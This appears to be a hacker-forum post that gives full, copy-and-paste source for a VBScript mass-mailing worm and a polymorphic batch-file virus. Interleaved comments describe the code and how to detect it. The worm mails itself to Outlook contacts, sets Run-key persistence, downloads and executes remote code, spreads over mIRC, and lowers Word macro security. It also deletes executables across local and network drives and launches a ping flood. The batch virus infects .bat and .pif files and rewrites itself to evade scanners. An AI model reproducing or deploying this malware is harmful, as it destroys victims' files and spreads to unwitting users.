First of all, some of you need to learn how
to read! Most good hacking techniques are in books; if hackers post really good techniques, those techniques get patched and the hacker is screwed!
anyway...
To make a DEADLY virus, open up notepad and
copy and paste the following...
'Serial Number : 0.7055475
'
' Analyst note: error handling is switched off for the whole script, so a
' missing COM object or path does not stop the later routines from running.
On Error Resume Next
' spawn: copies the running script file to fixed locations on C:.
' Artifacts: the .vbs paths on the f.Copy lines below. c:\attachment.vbs and
' c:\attachment1.vbs are attached by mail(); c:\anyname.vbs is embedded by the
' Word macro that word() installs. Unexpected .vbs files in the root of C:
' are a simple host indicator.
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
' Handle to the script file currently being run by the script host.
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\anyname.vbs")
f.Copy ("c:\folder\subfolder\...\anyname.vbs")
f.Copy ("c:\attachment.vbs")
f.Copy ("c:\attachment1.vbs")
end sub
' mail: drives Outlook through COM automation to mail the script out.
' For each address list it creates one message, adds at most five entries
' from that list as recipients, attaches the running script plus the two
' copies made by spawn(), and sends it.
' Detection: a script host (wscript/cscript) instantiating
' Outlook.Application; outbound mail carrying .vbs attachments with the fixed
' subject and body below. Mitigation: strip or block script attachments at the
' mail gateway and keep Outlook's programmatic-access prompts enabled.
mail()
sub mail()
Set a = CreateObject("Outlook.Application")
Set b = a.GetNameSpace("MAPI")
If a = "Outlook" Then
b.Logon "profile", "password"
For y = 1 To b.AddressLists.Count
Set d = b.AddressLists(y)
x = 1
' CreateItem(0) creates a mail item.
Set c = a.CreateItem(0)
For oo = 1 To d.AddressEntries.Count
e = d.AddressEntries(x)
c.Recipients.Add e
x = x + 1
' Once x passes 5 the loop counter is set to its end value, ending the loop.
If x > 5 Then oo = d.AddressEntries.Count
Next
c.Subject = "DOOM!"
c.Body = "...U Hav Bin Infected!!!"
c.attachments.Add wscript.scriptfullname, 1, 1
c.attachments.Add "c:\attachment.vbs", 1, 2, ""
c.attachments.Add "c:\attachment1.vbs", 1, 3, ""
c.Send
e = ""
Next
b.Logoff
End If
end sub
' reg: persistence. Writes a value named *HLM under the machine-wide Run key
' whose data is the path of the running script, so the script is started again
' at logon.
' Detection: monitor writes to HKLM\...\CurrentVersion\Run, especially values
' whose data points at a .vbs file. Removing the value is part of clean-up.
reg()
sub reg()
dim j
Set j = CreateObject("WScript.Shell")
j.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\*HLM", wscript.scriptfullname
end sub
' update: download-and-execute. Fetches text from the URL below with the
' InetCtls.Inet control (30 set as the request timeout), writes it to
' c:\update.vbs and runs that file through WScript.Shell.
' The fetched text is executed as-is; nothing in this routine checks it.
' The URL on this page contains a placeholder user name.
' Detection: a script host making an HTTP request and then creating and
' launching a .vbs file in the root of C:. Mitigation: egress filtering and
' blocking script-host execution of freshly written script files.
update()
Sub update()
Dim objInet, a
Dim strDownloadedCode
Set objInet = CreateObject("InetCtls.Inet")
objInet.RequestTimeOut = 30
strDownloadedCode = objInet.OpenURL("http://members.tripod.com/yourusername/thevbsroutineupdate.txt")
set fso = createobject("scripting.filesystemobject")
set f = fso.CreateTextFile("c:\update.vbs")
f.write strDownloadedCode
f.close
Set a = CreateObject("WScript.Shell")
a.run ("c:\update.vbs")
end sub
' irc: replaces mIRC's script.ini at the fixed install path below with an
' on-JOIN handler. The handler halts when the joining nick is the local user;
' for any other nick it issues a DCC send of the running script file.
' Detection: script.ini under the mIRC directory being created or rewritten by
' a process other than mIRC; script.ini containing a "/dcc send" line.
irc()
sub irc()
set fso = createobject("scripting.filesystemobject")
' CreateTextFile creates the file at this path for writing.
set scrini = fso.CreateTextFile("c:\program files\mirc\script.ini")
scrini.WriteLine "[script]"
scrini.WriteLine "n0=on 1:JOIN:#:{"
scrini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scrini.WriteLine "n2= /dcc send $nick " & wscript.scriptfullname
scrini.WriteLine "n3=}"
scrini.Close
end sub
' word: installs a VBA Document_Close handler into Word's Normal template.
' The string "norm" holds the VBA source of that handler. When a document is
' closed, the handler:
'   - writes c:\xploit.txt containing a document_open sub that activates the
'     first shape's OLE object in the document,
'   - replaces the code of the active document's first VB component with it,
'   - embeds c:\anyname.vbs (dropped by spawn()) in the document as an OLE
'     object and saves the document,
'   - writes c:\vv.reg, imports it silently with regedit /s and deletes it.
'     The .reg file sets Word\Security "Level" to 1 for Office 9.0 and 10.0
'     and "AccessVBOM" to 1 (macro security lowered, programmatic access to
'     the VBA project allowed - confirm meaning against Office documentation).
' Host artifacts: c:\try.txt, c:\xploit.txt, a transient c:\vv.reg, the two
' registry values above, and macro code in Normal.dot.
' Detection: a script host launching Word invisibly; regedit /s spawned by
' Word; changes to the Word\Security registry values.
word()
sub word()
norm ="Sub document_close()" & vbCrLf & _
"On Error Resume Next" & vbCrLf & _
"Open ""c:\xploit.txt"" For Output As 2" & vbCrLf & _
"Print #2, ""sub document_open()""" & vbCrLf & _
"Print #2, ""On Error Resume Next""" & vbCrLf & _
"Print #2, ""'by alcopaul""" & vbCrLf & _
"Print #2, ""obj = ActiveDocument.Shapes(1).OLEFormat.ClassType""" & vbCrLf & _
"Print #2, ""With ActiveDocument.Shapes(1).OLEFormat""" & vbCrLf & _
"Print #2, "" .ActivateAs ClassType:=obj""" & vbCrLf & _
"Print #2, "" .Activate""" & vbCrLf & _
"Print #2, ""End With""" & vbCrLf & _
"Print #2, ""end sub""" & vbCrLf & _
"Close 2" & vbCrLf & _
"Set fso = CreateObject(""Scripting.FileSystemObject"")" & vbCrLf & _
"Set nt = ActiveDocument.VBProject.vbcomponents(1).codemodule" & vbCrLf & _
"Set iw = fso.OpenTextFile(""c:\xploit.txt"", 1, True)" & vbCrLf & _
"nt.DeleteLines 1, nt.CountOfLines" & vbCrLf & _
"i = 1 " & vbCrLf & _
"Do While iw.atendofstream <> True" & vbCrLf & _
"b = iw.readline" & vbCrLf & _
"nt.InsertLines i, b " & vbCrLf & _
"i = i + 1 " & vbCrLf & _
"Loop" & vbCrLf & _
"ActiveDocument.Shapes.AddOLEObject _" & vbCrLf & _
"FileName:=""c:\anyname.vbs"", _" & vbCrLf & _
"LinkToFile:=False" & vbCrLf & _
"ActiveDocument.Save" & vbCrLf & _
"Open ""c:\vv.reg"" For Output As 3" & vbCrLf & _
"Print #3, ""REGEDIT4""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, ""[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]""" & vbCrLf & _
"Print #3, """"""Level""""=dword:00000001""" & vbCrLf & _
"Print #3, """"""AccessVBOM""""=dword:00000001""" & vbCrLf & _
"Close 3" & vbCrLf & _
"Shell ""regedit /s c:\vv.reg"", vbHide" & vbCrLf & _
"Kill ""c:\vv.reg""" & vbCrLf & _
"End Sub"
' The handler source is staged in c:\try.txt and read back line by line.
Set fso = CreateObject("Scripting.FileSystemObject")
set f = fso.createtextfile("c:\try.txt")
f.write norm
f.Close
' Word is started through COM with its window hidden.
Set oword = CreateObject("Word.Application")
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile("c:\try.txt", 1, True)
' Existing code in the template's first component is deleted before insertion.
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop
oword.NormalTemplate.Save
oword.NormalTemplate.Close
end sub
' haha: entry point of the file-system walk. Enumerates all drives and hands
' the path of every drive whose DriveType is 2 or 3 (fixed and network drives
' in the FileSystemObject constants) to hihi().
' Impact note: network drives are included, so mapped shares are in scope of
' the destructive routine hehe().
haha()
Sub haha()
On Error Resume Next
Dim d, dc, s, fso, haha
Set fso = CreateObject("Scripting.FileSystemObject")
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType = 3 Then
hihi (d.Path & "")
End If
Next
' s is never assigned in this routine.
haha = s
End Sub
' hehe: destructive payload applied to one folder (folderspec).
' For every file in the folder:
'   - extension "exe": the script is copied to "<file>.vbs" and the original
'     file is deleted;
'   - name freecell.exe, readme.txt or license.txt: the script is copied to
'     the file's own path and the file is then deleted;
'   - extension "exe" or "bat": the script is copied to "<file>.vbs".
' Detection: bursts of *.exe.vbs / *.bat.vbs file creation together with
' deletion of .exe files by a script host. Deleted programs are not
' recoverable from this script; restoration needs backups or reinstallation.
Sub hehe(folderspec)
On Error Resume Next
Dim f, f1, fc, ext, s, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
' Extension and file name are lower-cased before comparison.
ext = fso.GetExtensionName(f1.Path)
ext = LCase(ext)
s = LCase(f1.Name)
If (ext = "exe") Then
Set f = fso.GetFile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
fso.deletefile(f1.path)
End If
If (s = "freecell.exe") Or (s = "readme.txt") or (s = "license.txt") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path)
fso.deletefile(f1.path)
End If
If (ext = "exe") Or (ext = "bat") Then
Set f = fso.getfile(wscript.scriptfullname)
f.Copy (f1.Path & ".vbs")
End If
Next
End Sub
' hihi: recursive directory walk. For each subfolder of folderspec it runs
' hehe() on that subfolder and then calls itself on it, so every folder below
' the starting path is visited.
' Errors (for example access-denied folders) are ignored by the handler below.
Sub hihi(folderspec)
On Error Resume Next
Dim f, f1, sf, fso
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
hehe (f1.Path)
hihi (f1.Path)
Next
End Sub
' dos: launches ping from the fixed path below with -t (repeat until stopped)
' and -l 10000 (10000-byte payload) against the host name on that line.
' Detection: a script host spawning ping.exe with -t and a large -l value;
' sustained oversized ICMP echo traffic from a workstation.
dos()
sub dos()
Dim a
Set a = CreateObject("WScript.Shell")
a.run ("c:\windows\ping.exe -t -l 10000 www.grisoft.com")
end sub
' Final visible sign for the user: a message box titled "DOOM".
msgbox "INFECTED", ,"DOOM"
'=========================================
'made by : Zero Cool
'worm name : INF3CTER
'=========================================
stop copying (do not copy this line!!)
Now save the file as infecter.vbs on your
desktop and/or anywhere else you please.
The next virus I am about to show you is a
polymorphic virus (hard to be picked up by
anti virus scanners)...
Open notepad and copy and paste the following...
:: Analyst note (first stage of this batch file).
:: - Two environment variables are set to the command names "echo" and "copy";
::   later lines invoke echo only through the variable.
:: - Console output is redirected to nul with ctty while the first lines run.
:: - The for loop leaves the name of one .bat file from the current or parent
::   directory in an environment variable; if that file lacks the marker
::   string, the marker-bearing lines of this file are appended to it.
:: - Lines carrying this stage's marker are extracted with find into a batch
::   file in the root of C:, which is then given the hidden attribute (see the
::   attrib line below).
:: - That hidden file is run in a child command interpreter and calls itself
::   once per .bat file in the current and parent directory; files that already
::   contain the marker are skipped, others get the stored lines appended.
::   A counter variable stops the run after seven files.
:: Detection: hidden .bat file in C:\, .bat files growing in size, ctty use in
:: a batch file, find used with input and output redirection on .bat files.
@set hjmmt=echo
@set bugcl=copy
@ctty nul._!
for %%a in (*.bat ..\*.bat) do set _!=%%a
find "_!"<%_!%
if errorlevel 1 find "_!"<%0.BAT>>%_!%
ctty con._!
%hjmmt% off%[BfV_B]%
if '%1=='## goto BfV_%2
if exist C:\_BfV.bat goto BfV_
if not exist %0.bat goto BfV_end
find "BfV"<%0.bat>C:\_BfV.bat
attrib C:\_BfV.bat +h
:BfV_
command /e:5000 /c C:\_BfV ## run
goto BfV_end
:BfV_run
for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i
exit BfV
:BfV_inf
if '%BfV%=='1111111 exit
set BfV=%BfV%1
find "BfV"<%3>nul
if not errorlevel 1 goto BfV_end
type %3>BfV
type C:\_BfV.bat>>BfV
move BfV %3>nul
exit BfV
:BfV_end
:: Analyst note (second stage).
:: - The first line jumps to this stage's code; the "dummy host" lines stand
::   in for the original content of a modified batch file.
:: - The stage re-invokes its own file in a child command interpreter, then
::   runs the host part with the original arguments.
:: - Its own marker-bearing lines are extracted with find into a file under
::   %temp%, which is given the hidden attribute (see the attrib line below).
::   The source file is located by trying the current directory and each
::   directory in %path%.
:: - It then walks ".", ".." and every directory in %path%; each .bat file
::   without the marker is rebuilt as: jump line + original content + stored
::   lines.
:: - A counter of already-marked files leads, at ten, to a routine that feeds
::   hex bytes to debug to run a short machine-code program; the label text
::   on that routine describes it as a temporary screen effect.
:: Detection: hidden file in %temp%, debug started with redirected input from
:: a batch file, .bat files across %path% changing at the same time.
@if not '%0==' if '%_melt%==' goto meltbeg
::---- dummy host --------
%hjmmt% off
%hjmmt% Hello World!
::---- end dummy host ----
@goto MeLTend [MeLT_2a]
:MeLTbeg
%hjmmt% off%_MeLT%
if '%1=='MeLT goto MeLT%2
if not exist %comspec% set comspec=%_MeLT%command
%comspec% /e:5000 /c %0 MeLT vir
set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 MeLT rh
set _MeLT=
set MeLTcl=
goto MeLTend
:MeLTrh
set _MeLT=x
%0 %MeLTcl%
:MeLTvir
set MeLTH=%0
if not exist %_MeLT%%temp%\nul set temp=%tmp%
if exist %temp%\MeLT_2a goto MeLTrun
%0 MeLT fnd . %path%
:MeLTfnd
shift%_MeLT%
if '%2==' exit MeLT
set MeLT=%2\%MeLTH%.bat
if not exist %MeLT% set MeLT=%2\%MeLTH%
if not exist %MeLT% set MeLT=%2%MeLTH%.bat
if not exist %MeLT% set MeLT=%2%MeLTH%
if not exist %MeLT% goto MeLTfnd
find "MeLT"<%MeLT%>%temp%\MeLT_2a
attrib %temp%\MeLT_2a +h
:MeLTrun
%MeLTH% MeLT s . .. %path%
:MeLTs
shift%_MeLT%
if '%2==' exit MeLT
for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a
goto MeLTs
:MeLTinf
find /i "MeLT"<%3>nul
if not errorlevel 1 goto MeLTno
%hjmmt% @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t
type %3>>MeLT.t
%hjmmt%.>>MeLT.t
type %temp%\MeLT_2a>>MeLT.t
move MeLT.t %3>nul
exit MeLT
:MeLTact - flash-melt screen text then put back to normal
%hjmmt% e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t
%hjmmt% e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t
%hjmmt% e 120 B4 4C CD 21 00>>MeLT.t
%hjmmt% g>>MeLT.t
debug<MeLT.t>nul
del MeLT.t
exit MeLT
:MeLTno
set MeLTC=%MeLTC%1
if %MeLTC%==1111111111 goto MeLTact
:MeLTend
:: Analyst note (third stage, targets .pif shortcut files).
:: - A variable holds the name of the program this batch file stands in for;
::   the stage runs its own search routine in a child command interpreter and
::   then runs that program with the original arguments.
:: - Activation check: the output of date is searched for "sat" and the output
::   of time for "7"; depending on the result it prints nothing, a one-line
::   credit, or a short verse followed by a pause.
:: - Search routine: for every .pif file in the current directory, debug is
::   driven with a generated command script to copy two fields out of the .pif
::   into temporary batch files, which are called to load the values into
::   environment variables (program file name and a marker field).
:: - Files already marked, with an empty program name, or pointing at a name
::   containing "command" are skipped.
:: - Otherwise a hidden companion .bat named after the program is created,
::   and debug is used again to write the marker and the companion's name into
::   the .pif, so the shortcut starts the companion instead of the program.
:: Detection: debug run with a .pif file as argument and redirected input;
:: hidden .bat files next to .pif files; .pif files whose program field ends
:: in .bat; temporary files with "$" or "!" in their names in the working
:: directory.
%hjmmt% off
:: host filename...
set pifvo=LIST.COM
:: loop dispatcher...
if '%1=='PiFV goto PiFV_%2
:: run the virus!
set _PiFV=
if not exist %comspec% set comspec=C:\COMMAND.COM%_PiFV%
%comspec% /e:5000 /c %0 PiFV go>nul
if exist PiFV! del PiFV!
:: run the host
set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9
call %0 PiFV hst
set PiFVo=
set PiFVcl=
:: check for activation...
%hjmmt%.|date|find /i "sat">nul.PiFV
if errorlevel 1 goto PiFV_end
%hjmmt%.|time|find "7">nul.PiFV
if errorlevel 1 goto PiFV_msg
set PiFV=%hjmmt%
cls%_PiFV%
%PiFV%.
%PiFV% There once was an Otter named Oscer
%PiFV% Who claimed to know how to make water.
%PiFV% "No more dams," he said, "use my water instead!"
%PiFV% But the Elder Otter was not impressed.
pause>nul.PiFV
set PiFV=
goto PiFV_end
:PiFV_msg
%hjmmt% [PiFV] by WaveFunc
goto PiFV_end
:PiFV_hst
%PiFVo% %PiFVcl%
goto PiFV_end
:PiFV_go
set PiFVh=%0
if not exist %PiFVh% set PiFVh=%0.bat
if not exist %PiFVh% exit
for %%a in (*.pif) do call %0 PiFV inf %%a
exit PiFV
:PiFV_inf
set PiFVp=%3
:: get victim filename and infection marker
:: from PIF file using debug...
if exist PiFV! goto PiFV_1
%hjmmt% m 124,162 524>PiFV!
%hjmmt% e 100 '@set fn='>>PiFV!
%hjmmt% m 524,562 108>>PiFV!
%hjmmt% n pifv$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 47>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% m 55E,561 108>>PiFV!
%hjmmt% e 10C 0>>PiFV!
%hjmmt% n pifv$$.bat>>PiFV!
%hjmmt% rcx>>PiFV!
%hjmmt% 10>>PiFV!
%hjmmt% w>>PiFV!
%hjmmt% q>>PiFV!
:PiFV_1
debug %PiFVp%<PiFV!>nul
call PiFV$
set PiFVn=%fn%
call PiFV$$
set PiFVi=%fn%
del PiFV$?.bat
:: pifvn=orig filename
:: pifvi=infection marker
:: pifvp=pif filename
:: pifvh=companion bat file
:: skip infected or 'empty' pifs...
if '%PiFVi%=='PiFV goto PiFV_end
if '%PiFVn%==' goto PiFV_end
:: don't shadow command.com (be nice)
%hjmmt% %PiFVn%|find /i "command">nul
if not errorlevel 1 goto PiFV_end
:: infectable - create a companion batch...
:: (the following code strips off the extension)
%hjmmt% e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$
%hjmmt% e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$
%hjmmt% e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$
%hjmmt% n pifv$.com>>PiFV$$
%hjmmt% rcx>>PiFV$$
%hjmmt% 2a>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug<PiFV$$>nul
%hjmmt% %PiFVn%|PiFV$>PiFV$$.bat
call PiFV$$
set PiFVb=%fn%.bat
del PiFV$?.*
:: pifvb=new batch name
:: do not shadow if comp has same name as host
if %PiFVo%==%PiFVb% goto PiFV_end
if exist %PiFVb% goto PiFV_end
%hjmmt% %hjmmt% off>%PiFVb%
%hjmmt% set pifvo=%pifvn%>>%PiFVb%
find "PiFV"<%PiFVh%>>%PiFVb%
attrib %PiFVb% +h
:: ...and point the PIF at the companion
%hjmmt% e 15E 'PiFV',0>PiFV$$
%hjmmt% e 124 '%PiFVb%',0>>PiFV$$
%hjmmt% w>>PiFV$$
%hjmmt% q>>PiFV$$
debug %PiFVp%<PiFV$$>nul
del PiFV$$
:: I think we're done!
exit PiFV
:PiFV_end
:: Analyst note (self-rewriting tail).
:: - The echo lines below write a VBScript file, poly.vbs, one line at a time.
:: - The generated script reads the whole text of this batch file (%0), picks
::   random lowercase letters and digits, replaces the two variable names that
::   are set at the top of this batch file with altered names, and writes the
::   result back over the same file.
:: - The batch file then runs the script with cscript, deletes it and exits.
:: The only text that changes between runs is those two names, so the change
:: affects matching on exact file content and not what the file does.
:: Detection: a command interpreter writing a .vbs file and running it with
:: cscript straight away; a batch file opened for writing by the script it
:: has just launched; short-lived poly.vbs in the working directory.
%hjmmt% set ff=createobject("scripting.filesystemobject")>>poly.vbs
%hjmmt% set rr=ff.opentextfile(%0,1)>>poly.vbs
%hjmmt% aa = rr.readall>>poly.vbs
%hjmmt% rr.close>>poly.vbs
%hjmmt% Randomize>>poly.vbs
%hjmmt% poly = int(rnd * 3)>>poly.vbs
%hjmmt% if poly = 0 or poly = 2 then>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt","hjmmt" ^& s ^& poly)>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl","bugcl" ^& s ^& s ^& poly)>>poly.vbs
%hjmmt% else>>poly.vbs
%hjmmt% polynum = int(rnd * 7)>>poly.vbs
%hjmmt% for i = 1 to polynum>>poly.vbs
%hjmmt% polychar = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% polyall = polyall + polychar>>poly.vbs
%hjmmt% next>>poly.vbs
%hjmmt% s = chr(int(22 * rnd) + 97)>>poly.vbs
%hjmmt% rand1 = Replace(aa,"hjmmt",polyall )>>poly.vbs
%hjmmt% rand2 = Replace(rand1,"bugcl", s ^& polyall)>>poly.vbs
%hjmmt% end if>>poly.vbs
%hjmmt% set bb=ff.opentextfile(%0,2)>>poly.vbs
%hjmmt% bb.write rand2>>poly.vbs
@cscript poly.vbs
@del poly.vbs
@exit
stop copying (do not copy this line!!)
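The above virus is extremely difficult for AV
scanners that match on exact file text to detect, LOL! (It renames two of its own variables every time it runs, so the text keeps changing; a scanner that watches what the file does is not affected by that.)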
Hav Fun!!
I'll be posting more techniques soon!